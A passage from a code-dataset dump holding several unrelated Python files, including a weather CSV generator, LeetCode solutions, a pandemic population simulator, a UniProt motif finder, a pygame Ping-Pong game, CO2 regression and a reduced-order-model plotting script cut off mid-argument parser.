versionadded:: 0.13\n\n \"\"\"\n self.dxf.location = Vector(dx, dy, dz) + self.dxf.location\n return self\n","sub_path":"src/ezdxf/entities/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229470548","text":"from datetime import datetime, timedelta\nimport csv\nimport random\n\nclass Timer:\n\n\tdef __init__(self):\n\t\tself.start_dt = None\n\n\tdef start(self):\n\t\tself.start_dt = datetime.now()\n\n\tdef stop(self):\n\t\tend_dt = datetime.now()\n\t\tprint('Time taken: %s' % (end_dt - self.start_dt))\n\n\nclass Writer:\n\n\tdef write_predict(self, date, value, file_name):\n\t\twith open(file_name, 'a') as temp_file:\n\t\t\ttemp_writer = csv.writer(temp_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_NONNUMERIC)\n\t\t\ttemp_writer.writerow([date, value])\n\n\tdef set_file_to_write(self, file):\n\t\treturn file\n\nclass CsvReader:\n\n\tdef __init__(self):\n\t\tself.csvfilename = None\n\n\tdef get_last_raw_date(self, csvfilename):\n\t\trow_index = 0\n\t\twith open(csvfilename, \"r\") as scraped:\n\t\t\treader = csv.reader(scraped, delimiter=',')\n\t\t\tfor row in reader:\n\t\t\t\tif row: # avoid blank lines\n\t\t\t\t\trow_index += 1\n\t\t\t\t\tlast_date = row[0]\n\t\treturn last_date\n\n\tdef get_last_raw_temperature(self, csvfilename):\n\t\trow_index = 0\n\t\twith open(csvfilename, \"r\") as scraped:\n\t\t\treader = csv.reader(scraped, delimiter=',')\n\t\t\tfor row in reader:\n\t\t\t\tif row: # avoid blank lines\n\t\t\t\t\trow_index += 1\n\t\t\t\t\tlast_temperature = row[1]\n\t\tfloat_temp = float(last_temperature)\n\t\tint_temp = int(float_temp)\n\t\treturn int_temp\n\n\tdef get_last_row(self, csvfilename):\n\t\trow_index = 0\n\t\twith open(csvfilename, \"r\") as scraped:\n\t\t\treader = csv.reader(scraped, delimiter=',')\n\t\t\tfor row in reader:\n\t\t\t\tif row: # avoid blank lines\n\t\t\t\t\trow_index += 1\n\t\t\t\t\tcolumns = [str(row_index), row[0], row[1]]\n\t\treturn columns\n\n\nclass DateConverter:\n\n\tdef convert_to_datetime(self, string_date):\n\t\tdate = datetime.strptime(string_date, \"%Y-%m-%d\")\n\t\tdate = date.date()\n\t\treturn date\n\n\tdef get_next_day(self, actual_date):\n\t\tactual_date += timedelta(days=1)\n\t\treturn actual_date\n\n\nclass DateGenerator:\n\n\tdef generator(self, numberOfDate):\n\t\treader = CsvReader()\n\t\tconverter = DateConverter()\n\t\twriter = Writer()\n\t\tfilename = \"./data/weather_ajaccio.csv\"\n\t\tlast_row_date = reader.get_last_raw_date(filename)\n\t\tlast_row_date_to_data = converter.convert_to_datetime(last_row_date)\n\t\tnext_date = converter.get_next_day(last_row_date_to_data)\n\t\tlast_row_temp = reader.get_last_raw_temperature(filename)\n\t\tfor x in range(numberOfDate):\n\t\t\tif next_date.month == 1 or next_date.month == 2 or next_date.month == 3:\n\t\t\t\trandom_plus_temp = random.randint(-15, 0)\n\t\t\telif next_date.month == 4 or next_date.month == 5:\n\t\t\t\trandom_plus_temp = random.randint(-2, 2)\n\t\t\telif next_date.month == 6 or next_date.month == 7 or next_date.month == 8:\n\t\t\t\trandom_plus_temp = random.randint(4, 15)\n\t\t\telif next_date.month == 9 or next_date.month == 10:\n\t\t\t\trandom_plus_temp = random.randint(-4, 4)\n\t\t\telse:\n\t\t\t\trandom_plus_temp = random.randint(-8, 2)\n\n\t\t\ttemp = last_row_temp + random_plus_temp\n\t\t\twriter.write_predict(next_date,temp,filename)\n\t\t\tnext_date = 
converter.get_next_day(next_date)\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545589399","text":"'''\n\nYou are climbing a stair case. It takes n steps to reach to the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n\nNote: Given n will be a positive integer.\n\nExample 1:\n\nInput: 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\nExample 2:\n\nInput: 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n\n'''\n\nclass Solution:\n def climbStairs(self,n):\n if n == 1 or n == 2:\n return n\n else:\n return self.climbStairs(n-1)+self.climbStairs(n-2)\n def climbStairs2(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n if n == 0:\n \treturn 0\n\n dp = [0]*n\n dp[0], dp[1] = 1, 2\n\n for index in range(2, n):\n \tdp[index] = dp[index-1] + dp[index-2]\n return dp[n-1]\n\n# Time: O(N)\n# Space: O(N)\n\nprint (Solution().climbStairs(7))\n\n#Time complexity : O(n). Single loop upto n.\n\n#Space complexity : O(n). array of size n is used.\n","sub_path":"dynamic_programming/70-Climbing-Stairs.py","file_name":"70-Climbing-Stairs.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171161901","text":"# Confidential, Copyright 2020, Sony Corporation of America, All rights reserved.\n\nfrom typing import List, Optional\n\nimport numpy as np\n\nfrom .person_routines import get_minor_routines, get_adult_routines\nfrom ..environment import Home, CityRegistry, Person, Risk, Minor, School, Worker, Retired, JobCounselor, \\\n PopulationParams\n\n__all__ = ['make_us_age_population']\n\nage_group = range(2, 101)\n\n\ndef get_us_age_distribution(num_persons: int,\n numpy_rng: Optional[np.random.RandomState] = None) -> List[int]:\n numpy_rng = numpy_rng if numpy_rng is not None else np.random.RandomState()\n age_p = np.zeros(100)\n for i, age in enumerate(age_group):\n if age < 60:\n age_p[i] = numpy_rng.normal(1, 0.05)\n else:\n age_p[i] = (1 + (age - 60) * (0.05 - 1) / (100 - 60)) * numpy_rng.normal(1, 0.05)\n age_p /= np.sum(age_p)\n ages = [numpy_rng.choice(np.arange(1, 101), p=age_p) for _ in range(num_persons)]\n print(f'Average age: {np.average(ages)}')\n return ages\n\n\ndef make_us_age_population(population_params: PopulationParams,\n registry: CityRegistry,\n regulation_compliance_prob: float = 1.0,\n numpy_rng: Optional[np.random.RandomState] = None) -> List[Person]:\n home_ids = registry.location_ids_of_type(Home)\n school_ids = registry.location_ids_of_type(School)\n num_persons = population_params.num_persons\n\n numpy_rng = numpy_rng if numpy_rng is not None else np.random.RandomState()\n\n job_counselor = JobCounselor(population_params, registry, numpy_rng=numpy_rng)\n\n # assign age (based on the age profile of USA)\n ages = get_us_age_distribution(num_persons, numpy_rng=numpy_rng)\n ages.sort()\n persons: List[Person] = []\n # last 15% of homes in homes_id are for retirees only (1-2 retirees each)\n retired_homes = int((float(len(home_ids))) * 0.15)\n family_homes = len(home_ids) - retired_homes\n age_iter = 0\n # assign minors randomly to family homes\n while ages[age_iter] <= 18:\n age = ages[age_iter]\n home_id = home_ids[numpy_rng.randint(0, 
family_homes)]\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n school_id = school_ids[numpy_rng.randint(0, len(school_ids))]\n persons.append(Minor(age, home_id, registry=registry, risk=risk, school=school_id,\n outside_school_routines=get_minor_routines(home_id, registry, numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'minor_{age_iter}'))\n age_iter += 1\n home_iter = 0\n # assign adults to family homes, each family home must have at least one adult\n while home_iter < family_homes:\n home_id = home_ids[home_iter]\n num_adults = numpy_rng.randint(1, 2)\n if ages[age_iter] > 65:\n break\n for i in range(num_adults):\n age = ages[age_iter]\n if age > 65:\n break\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n work_id = job_counselor.next_available_work_id()\n assert work_id is not None, 'Not enough available jobs, increase assignee capacity of certain businesses'\n persons.append(Worker(age, home_id, registry=registry, risk=risk, work=work_id,\n outside_work_routines=get_adult_routines(Worker, home_id, registry,\n numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'worker_{age_iter}'))\n age_iter += 1\n home_iter += 1\n # if there are remaining adults to be assigned, but all family homes have at least one adult already,\n # loop back to beginning of home_ids\n if ages[age_iter] <= 65 and home_iter >= family_homes:\n home_iter = 0\n home_iter = family_homes\n # fill retiree homes\n while family_homes < home_iter < len(home_ids):\n home_id = home_ids[home_iter]\n num_retirees = numpy_rng.randint(1, 3)\n for i in range(num_retirees):\n age = ages[age_iter]\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n persons.append(Retired(age, home_id, registry=registry, risk=risk,\n routines=get_adult_routines(Retired, home_id, registry, numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'retired_{age_iter}'))\n age_iter += 1\n home_iter += 1\n home_iter = 0\n # assign remaining retirees to family homes\n while age_iter < len(ages):\n home_id = home_ids[home_iter]\n num_retirees = numpy_rng.randint(1, 2)\n for i in range(num_retirees):\n age = ages[age_iter]\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n persons.append(Retired(age, home_id, registry=registry, risk=risk,\n routines=get_adult_routines(Retired, home_id, registry, numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'retired_{age_iter}'))\n age_iter += 1\n home_iter += 1\n if home_iter >= len(home_ids):\n home_iter = 0\n return persons\n","sub_path":"python/pandemic_simulator/script_helpers/population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"31299177","text":"from collections import Counter\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n if len(s) != len(t):\n return False\n sC = Counter(s)\n tC = Counter(t)\n for x in sC:\n if sC[x] != tC[x]:\n return False\n return True\n\nprint(Solution.isAnagram(Solution, \"cat\", \"ta\"))","sub_path":"Leetcode/Valid 
Anagram(242).{python3}/ValidAnagram.py","file_name":"ValidAnagram.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"610792551","text":"import sys\nimport cgitb\nimport traceback\n\ndef func(a, b):\n return a / b\n\nif __name__ == \"__main__\":\n cgitb.enable(format = 'text')\n x = 10\n y = 100\n func(x, y)\n y = 0\n func(x ,y)\n \n","sub_path":"python-inspect/python_inspect/cgitb_test.py","file_name":"cgitb_test.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"415333499","text":"from pygame import *\r\nwidht = 700\r\nhight = 600\r\nFPS = 120\r\nclass GameSprite(sprite.Sprite):\r\n def __init__(self, player_image, player_x, player_y, player_w, player_h, player_speed, player_speed2 = 0):\r\n super().__init__()\r\n self.image = transform.scale(image.load(player_image), (player_w, player_h))\r\n self.speed = player_speed\r\n self.speed2 = player_speed2\r\n self.rect = self.image.get_rect()\r\n self.rect.x = player_x\r\n self.rect.y = player_y\r\n def reset(self):\r\n window.blit( self.image, (self.rect.x, self.rect.y))\r\n\r\n\r\nclass Player(GameSprite):\r\n def update1(self):\r\n keys = key.get_pressed()\r\n if keys [K_w] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if keys [K_s] and self.rect.y < 450:\r\n self.rect.y += self.speed\r\n def update2(self):\r\n keys = key.get_pressed()\r\n if keys [K_UP] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if keys [K_DOWN] and self.rect.y < 450:\r\n self.rect.y += self.speed\r\n\r\n\r\nclass Ball(GameSprite):\r\n def update(self):\r\n self.rect.x += self.speed\r\n self.rect.y += self.speed2\r\n if self.rect.y < 0:\r\n self.speed2 *= -1\r\n if self.rect.y > 550:\r\n self.speed2 *= -1\r\n \r\nfont.init()\r\nfont1 = font.Font(None, 40)\r\nfin1 = font1.render(\"Player 2 win!\", 1, (0, 255, 0)) \r\nfin2 = font1.render(\"Player 1 win!\", 1, (0, 255, 0)) \r\nrok1 = Player(\"raketka.png\", 10, 50, 50, 150, 7)\r\nrok2 = Player(\"raketka.png\", 645, 400, 50, 150, 7)\r\nball = Ball(\"algoball.png\", 270 , 320, 50, 50, 8, 8) \r\npl1 = font1.render(\"Player 1\", 1, (0, 255, 0))\r\npl2 = font1.render(\"Player 2\", 1, (0, 255, 0))\r\nkub1 = GameSprite(\"algokub.png\", 50, 70, 150, 150, 0)\r\nkub2 = GameSprite(\"algokub.png\", 520, 70, 150, 150, 0)\r\n\r\nwindow = display.set_mode((widht, hight))\r\ndisplay.set_caption(\"Ping-Pong\")\r\nwindow.fill((200, 200, 255))\r\nfinish = False\r\nrun = True\r\nwhile run:\r\n window.fill((200, 200, 255))\r\n for e in event.get():\r\n if e.type == QUIT:\r\n run = False\r\n ball.reset()\r\n ball.update()\r\n rok1.reset()\r\n rok1.update1()\r\n window.blit(pl1, (15, 15))\r\n window.blit(pl2, (575, 15))\r\n rok2.reset()\r\n rok2.update2()\r\n if ball.rect.x < 0:\r\n finish = True\r\n window.blit(fin1, (260, 300))\r\n kub2.reset()\r\n kub2.update()\r\n if ball.rect.x > 650:\r\n finish = True\r\n window.blit(fin2, (260, 300))\r\n kub1.reset()\r\n kub1.update()\r\n if sprite.collide_rect(ball, rok1) or sprite.collide_rect(ball, rok2):\r\n ball.speed *= -1\r\n display.update()\r\n time.delay(50)\r\n","sub_path":"Ping-Pong.py","file_name":"Ping-Pong.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2577948","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport 
statsmodels.formula.api as smf\nimport math\nimport numpy as np\n\nurl = 'ftp://aftp.cmdl.noaa.gov/products/trends/co2/co2_mm_mlo.txt'\ndata = pd.read_csv(url, delimiter='\\s+', skiprows=72,\n names=['0','1','decimal date','average','interpolated','trend','#days'])\n\n# time (t) goes on the x-axis and co2 goes on the y-axis\n\nco2 = data['interpolated']\n\nt = data['decimal date'] # by default, statsmodels doesn't compute y-intercept\nT = sm.add_constant(t)\ntsquared = t**2 # squaring provides the 'quadratic' aspect\nTsquared = sm.add_constant(tsquared) # again, by default, statsmodels doesn't compute y-intercept\n\nmodel = smf.ols(formula = 'co2 ~ T + Tsquared', data = data).fit()\nresults = model.fittedvalues\nprint(model.summary())\n\nplt.figure(1)\nplt.subplot(211)\nplt.plot(t, co2)\nplt.plot(t, results)\nplt.title('Quadratic Model of Atmospheric CO2 at Mauna Loa Observatory')\nplt.ylabel('CO2 Concentration (ppmv)')\n\nresiduals = model.resid\n# c1 = np.cos(2*math.pi*t)\n# s1 = np.sin(2*math.pi*t)\n# residualModel = smf.ols(formula = 'residuals ~ T + Tsquared + c1 + s1', data = residuals).fit()\n\nplt.subplot(212)\nplt.plot(t, residuals)\n# plt.plot(t, residualModel.fittedvalues)\nplt.ylabel('Residuals (ppmv)')\nplt.xlabel('Time (years)')\nplt.title('Residuals showing sinusoidal shape')\nplt.show()","sub_path":"chapter2/b.quadratic_model.py","file_name":"b.quadratic_model.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"101991420","text":"from client import *\nimport os \nimport csv\n\naudio_dir = 'cmu_us_bdl_arctic/wav/'\naudio_files = os.listdir(audio_dir)\n\nmodel = 'models/output_graph.pbmm'\nalphabet = 'models/alphabet.txt'\nlm = 'models/lm.binary'\ntrie = 'models/trie'\nf = open('result.csv', 'w')\n \nfor idx, audio in enumerate(audio_files):\n\ttext = predict(model, alphabet, lm, trie, os.path.join(audio_dir, audio))\n\twriter = csv.writer(f)\n\twriter.writerow([audio, text])\n\tprint('Done converting audio :', idx)\n\tif idx == 100: break\t\n","sub_path":"predict_for_all.py","file_name":"predict_for_all.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"138460198","text":"#Finding a protein motif - from a list of uniprot_id, obtain complete description and features of each (from UniProt site)\n#For each protein possessing the N-glycosylation motif, output its given access ID followed by a list of locations in the protein string where the motif can be found.\n\nlink = 'http://www.uniprot.org/uniprot/'\nfrom urllib.request import urlretrieve #urllib & Requests libraries to automate file download in Python\nimport re\nwith open('file') as f:\n fjoin = ' '.join(line.strip() for line in f)\n fsplit = fjoin.split(' ') #fjoin & fsplit must be invoked to get the input filenames in a list without '\\n'\n for protein in fsplit:\n url = link+protein+'.fasta'\n urlretrieve(url,protein+'.txt')\n #idx = []\n #jseq = []\n with open(protein+'.txt') as sequence:\n seq = sequence.readlines()[1:]\n seq = ''.join(line.strip() for line in seq)\n N_idx = []\n N = []\n for i,j in enumerate(seq):\n if j == 'N':\n N.append(seq[i:i+4])\n N_idx.append(i+1) #this is the N_location (or start sequence but not N-gly site)\n #to assert whether N_gly is 
really an N-glycosylation site: validate values\n pattern = re.compile('N[^P][ST][^P]')\n bN_gly = []\n for iN in N:\n result = pattern.match(iN)\n bN_gly.append(bool(result))\n #print(bN_gly)\n a= dict(list(zip(N_idx,bN_gly)))\n N_gly = []\n for k,v in a.items():\n if v == True:\n N_gly.append(k)\n if N_gly != []:\n print(protein)\n print(*(sorted(N_gly, reverse=False)), sep=' ')\n\n #N{P}[ST]{P} - starts N, then any except P, then either S OR T, then any except P","sub_path":"motif_implies_function.py","file_name":"motif_implies_function.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229243327","text":"# step4_plot.py\n\"\"\"Simulate learned ROMs and visualize results. Figures are saved in the folder\ngiven by config.figures_path().\n\nExamples\n--------\n# Plot time traces of each variable at the monitor locations for the ROM\n# trained from 10,000 snapshots with 22 POD modes and a regularization\n# parameter 4e4.\n$ python3 step4_plot.py 10000 --time-traces --modes 22 --regularization 4e4\n\n# Plot spatial averages and species integrals for the ROM trained from\n# 20,000 snapshots with 44 POD modes and a regularization parameter 5e4.\n$ python3 step4_plot.py 20000 --statistical-features --modes 44 --regularization 5e4\n\nLoading Results\n---------------\n>>> import config\n>>> print(\"figures are saved to\", config.figures_path())\n\nCommand Line Arguments\n----------------------\n\"\"\"\nimport os\nimport h5py\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport rom_operator_inference as roi\n\nimport config\nimport utils\nimport data_processing as dproc\n\n\n# Helper functions ============================================================\n\ndef simulate_rom(trainsize, r, reg, steps=None):\n \"\"\"Load everything needed to simulate a given ROM, simulate the ROM,\n and return the simulation results and everything needed to reconstruct\n the results in the original high-dimensional space.\n Raise an Exception if any of the ingredients are missing.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n Regularization parameter used to train the ROM.\n\n steps : int or None\n Number of time steps to simulate the ROM.\n\n Returns\n -------\n t : (nt,) ndarray\n Time domain corresponding to the ROM outputs.\n\n V : (config.NUM_ROMVARS*config.DOF,r) ndarray\n POD basis used to project the training data (and for reconstructing\n the full-order scaled predictions).\n\n scales : (NUM_ROMVARS,4) ndarray\n Information for how the data was scaled. 
See data_processing.scale().\n\n x_rom : (nt,r) ndarray\n Prediction results from the ROM.\n \"\"\"\n # Load the time domain, basis, initial conditions, and trained ROM.\n t = utils.load_time_domain(steps)\n V, _ = utils.load_basis(trainsize, r)\n X_, _, _, scales = utils.load_projected_data(trainsize, r)\n rom = utils.load_rom(trainsize, r, reg)\n\n # Simulate the ROM over the full time domain.\n with utils.timed_block(f\"Simulating ROM with r={r:d}, \"\n f\"reg={reg:e} over full time domain\"):\n x_rom = rom.predict(X_[:,0], t, config.U, method=\"RK45\")\n\n return t, V, scales, x_rom\n\n\ndef get_traces(locs, data, V=None, scales=None):\n \"\"\"Reconstruct time traces from data, unprojecting and unscaling if needed.\n\n Parameters\n ----------\n locs : (l,nt) ndarray\n Index locations for the time traces to extract.\n\n data : (r,nt) or (config.DOF*config.NUM_ROMVARS,nt) ndarray\n Data from which to extract the time traces, either the output of a ROM\n or a high-dimensional data set.\n\n V : (config.DOF*config.NUM_ROMVARS,r) ndarray or None\n Rank-r POD basis. Only needed if `data` is low-dimensional ROM output.\n\n scales : (config.NUM_ROMVARS,4) ndarray or None\n Information for how the data was scaled (see data_processing.scale()).\n Only needed if `data` is low-dimensional ROM output.\n\n Returns\n -------\n traces : (l,nt) ndarray\n The specified time traces.\n \"\"\"\n # TODO: input shape checking\n if V is not None and scales is not None:\n return dproc.unscale(V[locs] @ data, scales)\n else:\n return data[locs]\n\n\ndef get_feature(key, data, V=None, scales=None):\n \"\"\"Reconstruct a statistical feature from data, unprojecting and\n unscaling if needed.\n\n Parameters\n ----------\n key : str\n Which statistical feature to calculate (T_mean, CH4_sum, etc.)\n\n data : (r,nt) or (config.DOF*config.NUM_ROMVARS,nt) ndarray\n Data from which to extract the features, either the output of a ROM\n or a high-dimensional data set.\n\n V : (config.DOF*config.NUM_ROMVARS,r) ndarray or None\n Rank-r POD basis. Only needed if data is low-dimensional ROM output.\n\n scales : (config.NUM_ROMVARS,4) ndarray or None\n Information for how the data was scaled (see data_processing.scale()).\n Only needed if `data` is low-dimensional ROM output.\n\n Returns\n -------\n feature : (nt,) ndarray\n The specified statistical feature.\n \"\"\"\n # TODO: input shape checking\n var, action = key.split('_')\n print(f\"{action}({var})\", end='..', flush=True)\n if V is not None and scales is not None:\n variable = dproc.unscale(dproc.getvar(var, V) @ data, scales, var)\n else:\n variable = dproc.getvar(var, data)\n return eval(f\"variable.{action}(axis=0)\")\n\n\n# Plot routines ===============================================================\n\ndef time_traces(trainsize, r, reg, elems):\n \"\"\"Plot the time trace of each variable in the original data at the monitor\n location, and the time trace of each variable of the ROM reconstruction at\n the same locations. One figure is generated per variable.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. 
This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n Regularization parameter used to train the ROM.\n\n elems : list(int) or ndarray(int)\n Indices in the spatial domain at which to compute the time traces.\n \"\"\"\n # Get the indicies for each variable.\n elems = np.atleast_1d(elems)\n nelems = elems.size\n nrows = (nelems // 2) + (1 if nelems % 2 != 0 else 0)\n elems = np.concatenate([elems + i*config.DOF\n for i in range(config.NUM_ROMVARS)])\n\n # Load and lift the true results.\n data, _ = utils.load_gems_data(rows=elems[:nelems*config.NUM_GEMSVARS])\n with utils.timed_block(\"Lifting GEMS time trace data\"):\n traces_gems = dproc.lift(data)\n\n # Load and simulate the ROM.\n t, V, scales, x_rom = simulate_rom(trainsize, r, reg)\n\n # Reconstruct and rescale the simulation results.\n simend = x_rom.shape[1]\n with utils.timed_block(\"Reconstructing simulation results\"):\n traces_rom = dproc.unscale(V[elems] @ x_rom, scales)\n\n # Save a figure for each variable.\n xticks = np.arange(t[0], t[-1]+.001, .002)\n for i,var in enumerate(config.ROM_VARIABLES):\n fig, axes = plt.subplots(nrows, 2 if nelems > 1 else 1,\n figsize=(9,3*nrows), sharex=True)\n axes = np.atleast_2d(axes)\n for j, ax in enumerate(axes.flat):\n idx = j + i*nelems\n ax.plot(t, traces_gems[idx,:], lw=1, **config.GEMS_STYLE)\n ax.plot(t[:simend], traces_rom[idx,:], lw=1, **config.ROM_STYLE)\n ax.axvline(t[trainsize], color='k', lw=1)\n ax.set_xlim(t[0], t[-1])\n ax.set_xticks(xticks)\n ax.set_title(f\"Location ${j+1}$\", fontsize=12)\n ax.locator_params(axis='y', nbins=2)\n for ax in axes[-1,:]:\n ax.set_xlabel(\"Time [s]\", fontsize=12)\n for ax in axes[:,0]:\n ax.set_ylabel(config.VARLABELS[var], fontsize=12)\n\n # Single legend to the right of the subplots.\n fig.tight_layout(rect=[0, 0, .85, 1])\n leg = axes[0,0].legend(loc=\"center right\", fontsize=14,\n bbox_to_anchor=(1,.5),\n bbox_transform=fig.transFigure)\n for line in leg.get_lines():\n line.set_linewidth(2)\n\n # Save the figure.\n utils.save_figure(\"timetrace\"\n f\"_{config.TRNFMT(trainsize)}\"\n f\"_{config.DIMFMT(r)}\"\n f\"_{config.REGFMT(reg)}_{var}.pdf\")\n\n\ndef save_statistical_features():\n \"\"\"Compute the (spatial) mean temperatures on the full time domain and\n save them for later. 
This only needs to be done once.\n \"\"\"\n # Load the full data set.\n gems_data, t = utils.load_gems_data()\n\n # Lift the data (convert to molar concentrations).\n with utils.timed_block(\"Lifting GEMS data\"):\n lifted_data = dproc.lift(gems_data)\n\n # Compute statistical features.\n with utils.timed_block(\"Computing statistical features of variables\"):\n mins, maxs, sums, stds, means = {}, {}, {}, {}, {}\n for var in config.ROM_VARIABLES:\n val = dproc.getvar(var, lifted_data)\n mins[var] = val.min(axis=0)\n maxs[var] = val.max(axis=0)\n sums[var] = val.sum(axis=0)\n stds[var] = val.std(axis=0)\n means[var] = sums[var] / val.shape[0]\n\n # Save the data.\n data_path = config.statistical_features_path()\n with utils.timed_block(\"Saving statistical features\"):\n with h5py.File(data_path, 'w') as hf:\n for var in config.ROM_VARIABLES:\n hf.create_dataset(f\"{var}_min\", data=mins[var])\n hf.create_dataset(f\"{var}_max\", data=maxs[var])\n hf.create_dataset(f\"{var}_sum\", data=sums[var])\n hf.create_dataset(f\"{var}_std\", data=stds[var])\n hf.create_dataset(f\"{var}_mean\", data=means[var])\n hf.create_dataset(\"time\", data=t)\n logging.info(f\"Statistical features saved to {data_path}\")\n\n\ndef statistical_features(trainsize, r, reg):\n \"\"\"Plot spatially averaged temperature and spatially integrated (summed)\n species concentrations over the full time domain.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n Regularization parameter used to train the ROM.\n \"\"\"\n # Load the true results.\n keys = [f\"{var}_mean\" for var in config.ROM_VARIABLES[:4]]\n keys += [f\"{var}_sum\" for var in config.SPECIES]\n feature_gems, t = utils.load_statistical_features(keys)\n keys = np.reshape(keys, (4,2), order='F')\n\n # Load and simulate the ROM.\n t, V, scales, x_rom = simulate_rom(trainsize, r, reg)\n\n # Initialize the figure.\n fig, axes = plt.subplots(keys.shape[0], keys.shape[1],\n figsize=(9,6), sharex=True)\n\n # Calculate and plot the results.\n for ax,key in zip(axes.flat, keys.flat):\n with utils.timed_block(f\"Reconstructing {key}\"):\n feature_rom = get_feature(key, x_rom, V, scales)\n ax.plot(t, feature_gems[key], lw=1, **config.GEMS_STYLE)\n ax.plot(t[:x_rom.shape[1]], feature_rom, lw=1, **config.ROM_STYLE)\n ax.axvline(t[trainsize], color='k')\n # each key has the form \"<var>_<action>\"; label the axis with the variable\n ax.set_ylabel(config.VARLABELS[key.split('_')[0]])\n ax.locator_params(axis='y', nbins=2)\n\n # Set titles, labels, ticks, and draw a single legend.\n for ax in axes[-1,:]:\n ax.set_xlim(t[0], t[-1])\n ax.set_xticks(np.arange(t[0], t[-1]+.001, .002))\n ax.set_xlabel(\"Time [s]\", fontsize=12)\n axes[0,0].set_title(\"Spatial Averages\", fontsize=14)\n axes[0,1].set_title(\"Spatial Integrals\", fontsize=14)\n\n # Legend on the right.\n fig.tight_layout(rect=[0, 0, .85, 1])\n leg = axes[0,0].legend(loc=\"center right\", fontsize=14,\n bbox_to_anchor=(1,.5),\n bbox_transform=fig.transFigure)\n for line in leg.get_lines():\n line.set_linewidth(2)\n\n utils.save_figure(f\"statfeatures\"\n f\"_{config.TRNFMT(trainsize)}\"\n f\"_{config.DIMFMT(r)}\"\n f\"_{config.REGFMT(reg)}.pdf\")\n\n# =============================================================================\n\ndef main(trainsize, r, reg, elems,\n plotTimeTrace=False, plotStatisticalFeatures=False):\n \"\"\"Make the indicated visualization.\n\n Parameters\n ----------\n trainsize : int\n Number of 
snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n The regularization parameters used to train each ROM.\n\n elems : list(int) or ndarray(int)\n Indices in the spatial domain at which to compute time traces.\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Time traces (single ROM, several monitoring locations).\n if plotTimeTrace:\n logging.info(\"TIME TRACES\")\n time_traces(trainsize, r, reg, elems)\n\n # Statistical features (single ROM, several features).\n if plotStatisticalFeatures:\n logging.info(\"STATISTICAL FEATURES\")\n # Compute GEMS features if needed (only done once).\n if not os.path.isfile(config.statistical_features_path()):\n save_statistical_features()\n statistical_features(trainsize, r, reg)\n\n\n# =============================================================================\nif __name__ == \"__main__\":\n # Set up command line argument parsing.\n import argparse\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.usage = f\"\"\" python3 {__file__} --help\n python3 {__file__} TRAINSIZE --time-traces\n --modes R --regularization REG\n --location M [...]\n python3 {__file__} TRAINSIZE --statistical-features\n --modes R --regularization REG\"\"\"\n # Positional arguments\n parser.add_argument(\"trainsize\", type=int,\n help=\"number of snapshots in the training data\")\n\n # Routine indicators\n parser.add_argument(\"-tt\", \"--time-traces\", 